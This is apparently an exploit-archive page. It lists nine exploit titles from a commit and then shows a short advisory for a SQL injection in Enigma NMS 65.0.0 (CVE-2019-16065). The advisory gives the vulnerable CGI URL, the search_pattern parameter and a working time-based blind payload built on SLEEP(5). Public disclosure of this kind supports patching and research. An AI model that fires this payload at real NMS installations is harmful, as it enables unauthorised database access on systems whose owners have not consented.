fcce3705a3
9 changes to exploits/shellcodes WordPress 5.2.3 - Cross-Site Host Modification Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection Online Appointment - SQL Injection Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting Dolibarr ERP-CRM 10.0.1 - SQL Injection
23 lines
No EOL
1.2 KiB
Text
23 lines
No EOL
1.2 KiB
Text
#--------------------------------------------------------------------#
|
|
# Exploit Title: Enigma NMS search_pattern SQL Injection #
|
|
# Date: 21 July 2019 #
|
|
# Author: Mark Cross (@xerubus | mogozobo.com) #
|
|
# Vendor: NETSAS Pty Ltd #
|
|
# Vendor Homepage: https://www.netsas.com.au/ #
|
|
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
|
|
# Version: Enigma NMS 65.0.0 #
|
|
# CVE-IDs: CVE-2019-16065 #
|
|
# Full write-up: https://www.mogozobo.com/?p=3647 #
|
|
#--------------------------------------------------------------------#
|
|
_ _
|
|
___ (~ )( ~)
|
|
/ \_\ \/ /
|
|
| D_ ]\ \/ -= Enigma SQLi by @xerubus =-
|
|
| D _]/\ \ -= We all have something to hide =-
|
|
\___/ / /\ \\
|
|
(_ )( _)
|
|
@Xerubus
|
|
|
|
Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
|
|
Vulnerable Parameter: search_pattern (GET)
|
|
Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'=' |